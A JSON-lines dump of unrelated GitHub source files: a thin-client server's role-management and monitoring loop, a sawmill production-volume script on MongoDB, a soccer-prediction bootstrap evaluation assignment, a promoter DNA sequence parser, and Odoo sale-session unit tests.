role.STATUS_RUNNING:\n\t\t\t\tt1 = time.time()\n\t\t\t\t\n\t\t\t\tif (t1-t0 > 20) or (not role.thread.isAlive()) or role.getStatus() is role.STATUS_ERROR:\n\t\t\t\t\tLogger.warn(\"SlaveServer::init role %s error\"%(role.getName()))\n\t\t\t\t\treturn False\n\t\t\t\t\n\t\t\t\tLogger.info(\"Waiting for role %s status running\"%(role.getName()))\n\t\t\t\ttime.sleep(1)\n\t\t\n\t\tself.updateMonitoring()\n\t\treturn True\n\t\n\t\n\tdef push_production(self):\n\t\ttry:\n\t\t\tself.smRequestManager.initialize()\n\t\texcept Exception:\n\t\t\tLogger.exception(\"smRequestManager initialize returned\")\n\t\t\treturn False\n\t\t\n\t\tif not self.smRequestManager.switch_status(self.smRequestManager.STATUS_READY):\n\t\t\tLogger.warn(\"SlaveServer::loop unable to send status ready\")\n\t\t\treturn False\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\trole.switch_to_production()\n\t\t\n\t\treturn True\n\t\n\t\n\tdef loop_procedure(self):\n\t\tfor role_dialog in list(self.role_dialogs):\n\t\t\trole = role_dialog[0]\n\t\t\tif not role.thread.isAlive():\n\t\t\t\tLogger.warn(\"Thread '%s' stopped\" % role.thread.getName())\n\t\t\t\tself.role_dialogs.remove(role_dialog)\n\t\t\n\t\tself.updateMonitoring()\n\t\t\n\t\tt1 = time.time()\n\t\tif t1-self.time_last_send_monitoring > 30:\n\t\t\tself.time_last_send_monitoring = t1\n\t\t\t\n\t\t\tdoc = self.getMonitoring()\n\t\t\tself.smRequestManager.send_server_monitoring(doc)\n\t\t\t\n\t\t\tself.time_last_send_monitoring = time.time()\n\t\n\t\n\tdef stop(self, Signum=None, Frame=None):\n\t\tLogger.info(\"SlaveServer stop\")\n\t\tself.stopped = True\n\t\t\n\t\tt0 = time.time()\n\t\tstop_timeout = Config.stop_timeout\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\trole.order_stop()\n\t\t\t\n\t\tself.smRequestManager.switch_status(self.smRequestManager.STATUS_PENDING)\n\t\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\twhile not role.stopped():\n\t\t\t\tt1 = time.time()\n\t\t\t\t\n\t\t\t\tif (stop_timeout > 0) and (t1-t0 > stop_timeout):\n\t\t\t\t\tLogger.warn(\"SlaveServer::stop role %s error\"%(role.getName()))\n\t\t\t\t\trole.force_stop()\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tLogger.debug(\"Waiting for role %s status stop\"%(role.getName()))\n\t\t\t\ttime.sleep(2)\n\t\t\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\tif role.thread.isAlive():\n\t\t\t\tLogger.debug(\"Waiting %s will stop\" % role.getName())\n\t\t\t\trole.thread.join(10)\n\t\t\t\tif role.thread.isAlive():\n\t\t\t\t\tLogger.error(\"Role %s was stopped by using low force\" % role.getName())\n\t\t\t\t\trole.thread._Thread__stop()\n\t\t\t\t\trole.thread.join(5)\n\t\t\t\t\tif role.thread.isAlive():\n\t\t\t\t\t\tLogger.error(\"Role %s was stopped by using force\" % role.getName())\n\t\t\t\t\t\trole.thread._Thread__delete()\n\t\t\trole.finalize()\n\t\t\t\n\t\t\tLogger.info(\"Role %s stopped\" % role.getName())\n\t\t\n\t\tself.communication.stop()\n\t\tif self.communication.thread.isAlive():\n\t\t\tself.communication.thread.join()\n\t\t\n\t\tself.smRequestManager.switch_status(self.smRequestManager.STATUS_DOWN)\n\t\n\t\n\tdef getMonitoring(self):\n\t\trootNode = self.monitoring.cloneNode(True)\n\t\trootNode.setAttribute(\"name\", self.smRequestManager.name)\n\t\t\n\t\tdoc = Document()\n\t\tfor (role, dialog) in self.role_dialogs:\n\t\t\tnode = doc.createElement(\"role\")\n\t\t\t\n\t\t\trole.getReporting(node)\n\t\t\tnode.setAttribute(\"name\", role.getName())\n\t\t\trootNode.appendChild(node)\n\t\t \n\t\tdoc.appendChild(rootNode)\n\t\treturn doc\n\t\n\t\n\tdef
updateMonitoring(self):\n\t\tcpu_load = System.getCPULoad()\n\t\tram_used = System.getRAMUsed()\n\t\t\n\t\tdoc = Document()\n\t\tmonitoring = doc.createElement('server')\n\t\t\n\t\tcpu = doc.createElement('cpu')\n\t\tcpu.setAttribute('load', str(cpu_load))\n\t\t\n\t\tmonitoring.appendChild(cpu)\n\t\t\n\t\tram = doc.createElement('ram')\n\t\tram.setAttribute('used', str(ram_used))\n\t\tmonitoring.appendChild(ram)\n\t\t\n\t\tself.monitoring = monitoring\n","repo_name":"ulteo/ovd","sub_path":"OvdServer/ovd/SlaveServer.py","file_name":"SlaveServer.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"5911711791","text":"from pymongo import MongoClient\nfrom math import pi, pow\nfrom copy import deepcopy\nfrom json import dumps\nfrom sys import argv as av\nimport re\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client.data\ndoc = db.production\n\npattern = '\\\\(([\\\\d, ]+)\\\\)'\n\n\ndef get_diam(item, diam):\n\tfor t in diam:\n\t\tif t[0] <= item < t[1]:\n\t\t\treturn str(t)\n\treturn 0\n\n\ndef create_res(diams: list, filtre_diam: tuple = None):\n\t\"\"\"\n\n\t:param diams: list of diameters\n\t:param filtre_diam: diameters filter\n\t:return:\n\t\"\"\"\n\tres = {\n\t\t'Cumul': {\n\t\t\t'nb': 0,\n\t\t\t'nb %': 0,\n\t\t\t'vol grume(m3)': 0,\n\t\t\t'vol prod(m3)': 0,\n\t\t\t'%': 0,\n\t\t\t'vol multi(m3)': 0,\n\t\t\t'vol multi(%)': 0,\n\t\t\t'vol delign(m3)': 0,\n\t\t\t'vol delign(%)': 0\n\t\t}\n\t}\n\tif filtre_diam:\n\t\tres[str(filtre_diam)] = deepcopy(res['Cumul'])\n\telse:\n\t\tfor diam in diams:\n\t\t\tres[str(diam)] = deepcopy(res['Cumul'])\n\treturn res\n\n\ndef appro(debut, fin, diams: list = None, filtre_long: int = None, filtre_diam: tuple = None):\n\t\"\"\"\n\t:param debut: start of the time range to select, formatted as 'yyyy-mm-ddThh:mm:ss'\n\t:param fin: end of the time range to select, formatted as 'yyyy-mm-ddThh:mm:ss'\n\t:param diams: list of diameter filter tuples\n\t:return: nothing\n\t\"\"\"\n\tquery = doc.find(\n\t\t{'TempsDeCycle.Time': {'$gte': debut, '$lt': fin}},\n\t\t{'MesureGrume': 1, 'InfosSciage': 1, '_id': 0}\n\t)\n\tres = create_res(diams, filtre_diam)\n\tres['Cumul']['nb %'] = 100\n\tnb_total = doc.count_documents({'TempsDeCycle.Time': {'$gte': debut, '$lt': fin}}, {})\n\tif not nb_total:\n\t\tprint({})\n\t\treturn\n\tfor item in query:\n\t\tif filtre_long and filtre_long != item['MesureGrume']['LongueurMarchandeMM']:\n\t\t\tcontinue\n\t\tdiam = get_diam(item['MesureGrume']['DiametreCubageMM'], diams)\n\t\tif diam in res:\n\t\t\tdiam_cub = item['MesureGrume']['DiametreCubageMM'] / 10 / 2\n\t\t\tlong_cub = item['MesureGrume']['LongueurCubageMM'] / 10\n\t\t\tvol = (pi * pow(diam_cub, 2) * long_cub) / 1000000\n\t\t\tres[diam]['vol grume(m3)'], res['Cumul']['vol grume(m3)'] = res[diam]['vol grume(m3)'] + vol, res['Cumul']['vol grume(m3)'] + vol\n\t\t\tres[diam]['nb'], res['Cumul']['nb'] = res[diam]['nb'] + 1, res['Cumul']['nb'] + 1\n\t\t\tfor x in item['InfosSciage']['InfosSciage']:\n\t\t\t\tvol = x['Epaisseur'] * x['Longueur'] * x['Largeur'] * x['NombreProduits'] / 1000000000\n\t\t\t\tif x['NombreProduits'] != 0:\n\t\t\t\t\tif x['Info'] & 1 == 1:\n\t\t\t\t\t\tres[diam]['vol multi(m3)'], res['Cumul']['vol multi(m3)'] = res[diam]['vol multi(m3)'] + vol, res['Cumul']['vol multi(m3)'] + vol\n\t\t\t\t\telse:\n\t\t\t\t\t\tres[diam]['vol delign(m3)'], res['Cumul']['vol delign(m3)'] = res[diam]['vol delign(m3)'] + vol, res['Cumul']['vol
delign(m3)'] + vol\n\t\t\t\t\tres[diam]['vol prod(m3)'] += vol\n\t\t\t\t\tres['Cumul']['vol prod(m3)'] += vol\n\tfor item in res:\n\t\tres[item]['nb %'] = round(res[item]['nb'] * 100 / nb_total)\n\t\tres[item]['vol grume(m3)'] = round(res[item]['vol grume(m3)'], 2)\n\t\tres[item]['vol multi(%)'] = round(res[item]['vol multi(%)'], 2)\n\t\tres[item]['vol delign(%)'] = round(res[item]['vol delign(%)'], 2)\n\t\tres[item]['%'] = round(res[item]['vol prod(m3)'] * 100 / res['Cumul']['vol grume(m3)'])\n\t\tres[item]['vol multi(%)'] = round(res[item]['vol multi(m3)'] * 100 / res['Cumul']['vol prod(m3)'])\n\t\tres[item]['vol delign(%)'] = round(res[item]['vol delign(m3)'] * 100 / res['Cumul']['vol prod(m3)'])\n\n\tx = res['Cumul']\n\tres.pop('Cumul')\n\tres['Cumul'] = x\n\tprint(res)\n\n\nif __name__ == '__main__':\n\tn, debut, fin, param, filtre_diam, filtre_long = av\n\tfiltre_long = int(filtre_long)\n\tparam = [int(x) for x in param.split(',')]\n\tparam = [(x, y) for x, y in zip(param[::2], param[1::2])]\n\tfiltre_diam = filtre_diam.split(',')\n\tfiltre_diam = (int(filtre_diam[0]), int(filtre_diam[1]))\n\tif filtre_diam == (0, 0):\n\t\tfiltre_diam = None\n\tif filtre_long == 0:\n\t\tfiltre_long = None\n\tappro(\n\t\tdebut=debut,\n\t\tfin=fin,\n\t\tdiams=param,\n\t\tfiltre_diam=filtre_diam,\n\t\tfiltre_long=filtre_long,\n\t)\n\t# print(param, filtre_diam, filtre_long,sep='\\n')","repo_name":"Inoruuk/API_Finega","sub_path":"static/js/Script/approvisionement.py","file_name":"approvisionement.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28623779760","text":"\"\"\"\r\nAuthor : Nam Tran, Leonardo Lindo, and Kyle Grace\r\nClass : HMC CS 158\r\nDate : 2020 May 12\r\nDescription : Soccer Match Winner Predictions\r\n\r\nThis code is adapted from course material by Jenna Wiens (UMichigan).\r\nDocstrings based on scikit-learn format.\r\n\"\"\"\r\n\r\n# python libraries\r\nimport os\r\nfrom joblib import load\r\n\r\n# data science libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# scikit-learn libraries\r\nfrom sklearn.dummy import DummyClassifier\r\nfrom sklearn.svm import LinearSVC, SVC\r\nfrom sklearn.utils import resample\r\nfrom sklearn.pipeline import Pipeline\r\n\r\n# project-specific helper libraries\r\nimport soccer_config\r\nfrom soccer_practice import score, METRICS\r\nimport classifiers\r\n\r\n\r\n\r\n######################################################################\r\n# globals\r\n######################################################################\r\n\r\nNRECORDS = 3733 # number of match records\r\nFEATURES_TRAIN_FILENAME, LABELS_TRAIN_FILENAME, \\\r\n FEATURES_TEST_FILENAME, LABELS_TEST_FILENAME = \\\r\n soccer_config.get_filenames(nrecords=NRECORDS, test_data=True)\r\n\r\n\r\n\r\n######################################################################\r\n# functions\r\n######################################################################\r\n\r\ndef get_test_scores(clf, X, y, n_bootstraps=1, metrics=['accuracy']) :\r\n \"\"\"\r\n Estimates the performance of the classifier using the 95% CI.\r\n \r\n Parameters\r\n --------------------\r\n clf : estimator object\r\n This is assumed to implement the scikit-learn estimator interface.\r\n The estimator must already be fitted to data.\r\n \r\n X : numpy array of shape (n_samples, n_features)\r\n Feature vectors of test set.\r\n \r\n y : numpy array of shape (n_samples,)\r\n Ground 
truth labels of test set.\r\n \r\n n_bootstraps : int\r\n Number of bootstrapping iterations.\r\n \r\n metrics : list\r\n Performance metrics.\r\n \r\n Returns\r\n --------------------\r\n scores : dict\r\n Dictionary of (metric, list of score) pairs.\r\n For instance, if n_bootstraps = 3 and metrics = ['accuracy', 'auroc'],\r\n then scores will be represented as a dict of\r\n {\r\n 'accuracy' : 0.81\r\n 'accuracy_boot' : [0.74, 0.70, 0.90]\r\n 'auroc' : 0.81\r\n 'auroc_boot' : [0.60, 0.75, 0.85]\r\n }\r\n \"\"\"\r\n \r\n # make predictions\r\n try :\r\n y_pred = clf.decision_function(X) \r\n except : # for dummy classifiers\r\n y_pred = clf.predict(X)\r\n \r\n # initialize dictionary\r\n scores = {}\r\n \r\n ### ========== TODO : START ========== ###\r\n # part a : find score on full data set\r\n # find bootstrap scores on resampled data set\r\n # professor's solution: 7 lines\r\n #\r\n # hint: use sklearn.utils.resample to sample\r\n # set random_state to the bootstrap iteration\r\n # to generate same sampling across metrics\r\n for m in metrics:\r\n scores[m] = score(y, y_pred, metric = m)\r\n\r\n for i in range(0, n_bootstraps):\r\n X, y = resample(X, y, random_state = i, replace = True) \r\n\r\n for m in metrics:\r\n if scores.get(m + '_boot') is None:\r\n scores[m + '_boot'] = [score(y, y_pred, metric = m)]\r\n else: \r\n scores[m + '_boot'].append(score(y, y_pred, metric = m))\r\n \r\n ### ========== TODO : END ========== ###\r\n \r\n return scores\r\n\r\n\r\ndef plot_results(clf_strs, score_names, scores) :\r\n \"\"\"\r\n Plot results as grouped bar plot,\r\n with metric along x-axis and model as groups.\r\n \r\n You do NOT have to understand the implementation of this function.\r\n \r\n Parameters\r\n ----------\r\n clf_strs : list\r\n List of strings, one per classifier.\r\n \r\n score_names : list\r\n List of scorer names.\r\n \r\n scores : dict\r\n Dictionary of (clf_str, score) pairs.\r\n For instance, if clf_strs == ['Dummy'] and score_names = ['score'],\r\n then scores will be represented as a dict of\r\n { 'Dummy' :\r\n {\r\n 'score' : 0.70\r\n 'lower_score' : 0.00\r\n 'upper_score' : 0.05\r\n }\r\n }\r\n \"\"\"\r\n \r\n # text annotation\r\n def autolabel(rects) :\r\n \"\"\"Attach a text label above each bar displaying its height\"\"\"\r\n for rect in rects:\r\n height = rect.get_height()\r\n ax.annotate(f\"{height:.3f}\", xy=(rect.get_x() + rect.get_width() / 2., height),\r\n xytext=(0, 3), textcoords='offset points', # 3 points vertical offset\r\n ha='center', va='bottom')\r\n \r\n scorers = sorted(score_names)\r\n n_scorers = len(scorers)\r\n ind = np.arange(n_scorers) # x locations for groups\r\n width = 1 / (len(clf_strs) + 1) # width of the bars\r\n \r\n # bar plot with error bars\r\n fig = plt.figure(figsize=[12.8, 9.6])\r\n ax = plt.gca()\r\n for j, clf_str in enumerate(clf_strs) :\r\n results = scores[clf_str]\r\n heights = np.empty((n_scorers),)\r\n errs = np.empty((2, n_scorers))\r\n \r\n for k, scorer in enumerate(scorers) :\r\n height = results[f'{scorer}']\r\n lower = results[f'lower_{scorer}']\r\n upper = results[f'upper_{scorer}']\r\n \r\n heights[k] = height\r\n errs[:,k] = (height - lower, upper - height)\r\n \r\n rects = ax.bar(ind + width * j, heights, width, yerr=errs, label=clf_str)\r\n autolabel(rects)\r\n \r\n # x-axis\r\n ax.set_xticks(ind + width * (len(clf_strs) - 1) / 2.)\r\n ax.set_xticklabels(scorers)\r\n \r\n # title\r\n ax.set_title('Test Performance')\r\n \r\n # y-axis\r\n ax.set_ylabel('score')\r\n ax.set_ylim(0, 1)\r\n \r\n # legend\r\n 
ax.legend(title='model',\r\n bbox_to_anchor=(1.04,.5), loc='center left')\r\n \r\n fig.tight_layout()\r\n plt.show()\r\n\r\n\r\n\r\n######################################################################\r\n# main\r\n######################################################################\r\n\r\ndef main():\r\n np.random.seed(42)\r\n \r\n #========================================\r\n # read data\r\n \r\n print('Reading data...')\r\n \r\n df_features_test = pd.read_csv(FEATURES_TEST_FILENAME)\r\n X_test = df_features_test.drop('MatchID', axis=1).values\r\n \r\n df_labels_test = pd.read_csv(LABELS_TEST_FILENAME)\r\n y_test = df_labels_test['Outcome'].values\r\n \r\n print()\r\n \r\n #========================================\r\n # evaluate on test data\r\n \r\n print('Evaluating on test data...')\r\n \r\n clf_strs = classifiers.CLASSIFIERS\r\n n_bootstraps = 100\r\n scores = {}\r\n \r\n for clf_str in clf_strs :\r\n # load pipelines from file\r\n # use the pipeline like any regular classifier\r\n # pipelines have already been refit on full training set using best found parameters\r\n # no need to retrain here\r\n filename = os.path.join(soccer_config.PICKLE_DIR, f'{clf_str}_soln.joblib')\r\n pipe = load(filename)\r\n \r\n # compute scores\r\n test_scores = get_test_scores(pipe, X_test, y_test, n_bootstraps, METRICS)\r\n \r\n ### ========== TODO : START ========== ###\r\n # part b : summarize to dictionary\r\n # professor's solution: 6 lines\r\n #\r\n # We will use this dictionary to visualize performance.\r\n # Example: scores_clf_str is a dictionary that looks like\r\n # {\r\n # 'accuracy' : 0.70\r\n # 'lower_accuracy' : 0.00\r\n # 'upper_accuracy' : 0.05\r\n # }\r\n # \r\n # You will have three dict items per score metric.\r\n # \r\n # The first element (e.g. 'accuracy') is the score on the full test set.\r\n # The lower and upper bound are based on the 95% confidence interval.\r\n # That is, lower value (e.g. 'lower_accuracy') corresponds to the 2.5-percentile,\r\n # and upper value (e.g. 
'upper_accuracy') corresponds to the 97.5-percentile.\r\n #\r\n # hint: use np.percentile to compute percentiles\r\n scores_clf = {}\r\n \r\n for m in METRICS:\r\n boot = test_scores[m + '_boot']\r\n scores_clf[m] = test_scores[m]\r\n scores_clf['lower_' + m] = np.percentile(boot, 2.5)\r\n scores_clf['upper_' + m] = np.percentile(boot, 97.5) \r\n \r\n ### ========== TODO : END ========== ###\r\n \r\n # save scores for current classifier\r\n scores[clf_str] = scores_clf\r\n \r\n # plot test performance\r\n plot_results(clf_strs, METRICS, scores)\r\n \r\n print()\r\n \r\n #========================================\r\n # feature importances\r\n \r\n print('Evaluating feature importance...')\r\n \r\n clf_str = 'LinearSVM'\r\n filename = os.path.join(soccer_config.PICKLE_DIR, f'{clf_str}_soln.joblib')\r\n pipe = load(filename)\r\n \r\n feature_names = df_features_test.drop('MatchID', axis=1).columns.tolist()\r\n coef = pipe['clf'].coef_[0]\r\n \r\n ### ========== TODO : START ========== ###\r\n # part e : identify important features\r\n # print to screen\r\n # professor's solution: 8 lines\r\n \r\n arr = []\r\n for i in range(0, len(feature_names)):\r\n arr.append([feature_names[i], coef[i]])\r\n arr = sorted(arr, key=lambda x: abs(x[1]))[-5:]\r\n ans = []\r\n for i in reversed(arr):\r\n ans.append(i)\r\n print(ans)\r\n ### ========== TODO : START ========== ###\r\n print()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"leothelindo/CS158-Soccer","sub_path":"source/soccer_insight.py","file_name":"soccer_insight.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41483451253","text":"import re\r\n\r\n\r\n\r\ndef convert_txt_to_pure_seq(string_seqs):\r\n new_string = string_seqs\r\n new_string.strip(\"BBa\")\r\n pattern = r\"[a-z]+\"\r\n pure_seqs = re.findall(pattern, string_seqs)\r\n pure_seq = list(set(pure_seqs))\r\n return pure_seq\r\n\r\n\r\n\r\n\r\ndef positive_seq_list():\r\n f_positive_seq = open('Positive_seqs_with_ref_(101).txt', 'r')\r\n seq_positive = f_positive_seq.read()\r\n list_seq_positive = convert_txt_to_pure_seq(seq_positive)\r\n f_positive_seq.close()\r\n return list_seq_positive\r\n\r\ndef constitutive_seq_list():\r\n f_constitutive_seq = open('Constitutive_seqs_with_ref_(49).txt', 'r')\r\n constitutive_seq = f_constitutive_seq.read()\r\n list_seq_constitutive = convert_txt_to_pure_seq(constitutive_seq)\r\n list_seq_constitutive.remove('a')\r\n f_constitutive_seq.close()\r\n return list_seq_constitutive\r\n\r\ndef Negative_seq_list():\r\n f_Negative_seq = open('Negative_seqs_with_ref(130).txt', 'r')\r\n Negative_seq = f_Negative_seq.read()\r\n list_seq_negative = convert_txt_to_pure_seq(Negative_seq)\r\n list_seq_negative.remove('a')\r\n f_Negative_seq.close()\r\n return list_seq_negative\r\n\r\n# 刚想到,可以用matplotlib查看一下序列长度的大致分布情况,然后考虑下一步\r\n\r\n\"\"\"\r\ndef max_len(list_seq_positive, list_seq_constitutive, list_seq_negative):\r\n max_positive, max_constitutive, max_negative = 0, 0, 0\r\n for i in range(len(list_seq_positive)):\r\n max_positive = max(max_positive, len(list_seq_positive[i]))\r\n for i in range(len(list_seq_constitutive)):\r\n max_constitutive = max(max_constitutive, len(list_seq_constitutive[i]))\r\n for i in range(len(list_seq_negative)):\r\n max_negative = max(max_negative, len(list_seq_negative[i]))\r\n max_len = max(max_constitutive, max_negative, max_positive)\r\n print 
max_len\r\n\"\"\"","repo_name":"shangjieZou/Promoter-transcriptional-predictor","sub_path":"Vectorizing Sequences.py","file_name":"Vectorizing Sequences.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36071348790","text":"import logging\n\nfrom odoo import fields\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tests.common import TransactionCase\n\n_log = logging.getLogger(__name__)\n\n\nclass TestSaleTeamCashCount(TransactionCase):\n\n def setUp(self):\n super().setUp()\n templates = self.env['account.chart.template'].search([], limit=1)\n if not templates:\n _log.warning(\n 'Test skipped because there is no chart of account defined '\n 'new company')\n self.skipTest('No Chart of account found')\n return\n if not templates.existing_accounting(self.env.user.company_id):\n templates.try_loading_for_current_company()\n self.product = self.env['product.product'].create({\n 'type': 'product',\n 'company_id': False,\n 'name': 'Test product',\n 'standard_price': 10,\n 'list_price': 100,\n })\n self.partner = self.env['res.partner'].create({\n 'name': 'Partner test',\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team = self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n 'require_sale_session': True,\n })\n\n def test_crm_team(self):\n with self.assertRaises(ValidationError):\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': 'a,'\n })\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': '1,'\n })\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': False\n })\n team = self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': '1,2,3,'\n })\n self.assertEquals(round(sum(team.get_cash_money_values()), 2), 6)\n team.cash_money_values = '0.1,0.2,0.3'\n self.assertEquals(round(sum(team.get_cash_money_values()), 2), 0.6)\n\n def test_sale_session(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n self.assertTrue(session.name)\n self.assertIn('SS', session.name)\n self.assertEquals(session.open_date.date(), fields.Date.today())\n self.assertEquals(session.close_date, False)\n self.assertEquals(session.validation_date, False)\n session.action_open()\n self.assertEquals(\n session.get_current_sale_session(self.team.id), session)\n with self.assertRaises(ValidationError):\n self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n with self.assertRaises(ValidationError):\n session.copy()\n\n def test_without_sale_session(self):\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.env.user.write({\n 'groups_id': [(6, 0, [self.env.ref(\n 'sale_session.group_without_sale_session').id])],\n })\n team = self.env['crm.team'].create({\n 'name': 'Without sale session',\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n 'member_ids': [(6, 0, [self.env.user.id])],\n 
})\n session = self.env['sale.session'].create({\n 'team_id': team.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': team.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertFalse(sale.session_id)\n\n def test_session_with_sales(self):\n with self.assertRaises(UserError):\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': False,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertEquals(sale.session_id, session)\n self.assertEquals(session.balance_end, 0)\n sale.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total)\n self.assertEquals(session.amount_diff, sale.amount_total)\n sale.action_invoice_create()\n sale = sale.copy()\n sale.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total * 2)\n wizard = self.env['sale.session.close'].create({\n 'session_id': session.id,\n })\n wizard.action_confirm()\n self.assertEquals(session.state, 'close')\n self.assertEquals(session.close_date.date(), fields.Date.today())\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n 'balance_start': 100,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n session.action_open()\n sale = sale.copy({'session_id': session.id})\n wizard = self.env['sale.order.payment'].create({\n 'sale_id': sale.id,\n 'journal_id': journal.id,\n 'amount': sale.amount_total,\n })\n wizard.action_confirm()\n self.assertEquals(session.balance_start, 100)\n self.assertEquals(session.balance_end, sale.amount_total + 100)\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(len(sale.invoice_ids), 1)\n self.assertEquals(sale.invoice_ids.state, 'paid')\n with self.assertRaises(UserError):\n wizard.action_confirm()\n session.state = 'close'\n session.action_validate()\n self.assertEquals(session.validation_date.date(), fields.Date.today())\n new_session = session.copy()\n self.assertEquals(new_session.balance_start, session.balance_end)\n\n def test_session_payment(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.assertTrue(journal)\n payment = session.register_payment(self.partner, journal, 100)\n self.assertEquals(payment.state, 'posted')\n self.assertEquals(len(session.payment_ids), 1)\n self.assertEquals(session.balance_start, 0)\n self.assertEquals(session.balance_end, 100)\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n self.assertEquals(len(session.payment_ids), 2)\n self.assertEquals(session.balance_start, 0)\n self.assertEquals(session.balance_end, 150)\n\n def test_session_close(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n session.action_open()\n sale = 
self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n bank_journal = self.env['account.journal'].search(\n [('type', '=', 'bank')], limit=1)\n wizard = self.env['sale.order.payment'].create({\n 'sale_id': sale.id,\n 'journal_id': bank_journal.id,\n 'amount': sale.amount_total,\n })\n wizard.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': cash_journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': cash_journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n self.assertEquals(\n session.balance_end, sale.amount_total + 100)\n wizard = self.env['sale.session.close'].create({\n 'session_id': session.id,\n })\n wizard.action_confirm()\n self.assertIsNot(session.close_date, False)\n self.assertIs(session.validation_date, False)\n self.assertEquals(len(wizard.journal_line_ids), 2)\n bank_line = wizard.journal_line_ids.filtered(\n lambda l: l.journal_id == bank_journal)\n self.assertEquals(bank_line.amount_total, sale.amount_total)\n session.action_validate()\n self.assertEquals(session.validation_date.date(), fields.Date.today())\n\n def test_session_open_cash_count(self):\n self.team.cash_money_values = (\n '0.01,0.05,0.10,0.20,0.50,1,2,5,10,20,50,100,200,500')\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n wizard = self.env['sale.session.wizard_cash_count'].create({\n 'session_id': session.id,\n 'journal_id': journal.id,\n 'type': 'open',\n })\n self.assertEquals(wizard.team_id, session.team_id)\n self.assertEquals(len(wizard.line_ids), 14)\n line = wizard.line_ids[0]\n line.quantity = 3\n self.assertEquals(wizard.amount_total, line.value * 3)\n wizard.action_confirm()\n self.assertEquals(len(session.open_cash_count_ids), 14)\n self.assertEquals(len(session.close_cash_count_ids), 0)\n self.assertEquals(session.open_cash_count_total, line.value * 3)\n self.assertEquals(session.close_cash_count_total, 0)\n\n def test_session_close_wizard(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n session.register_payment(self.partner, journal, 100)\n wizard_obj = self.env['sale.session.close']\n wizard = wizard_obj.create({\n 'session_id': session.id,\n })\n self.assertEquals(wizard.team_id, session.team_id)\n self.assertEquals(len(wizard.journal_line_ids), 1)\n 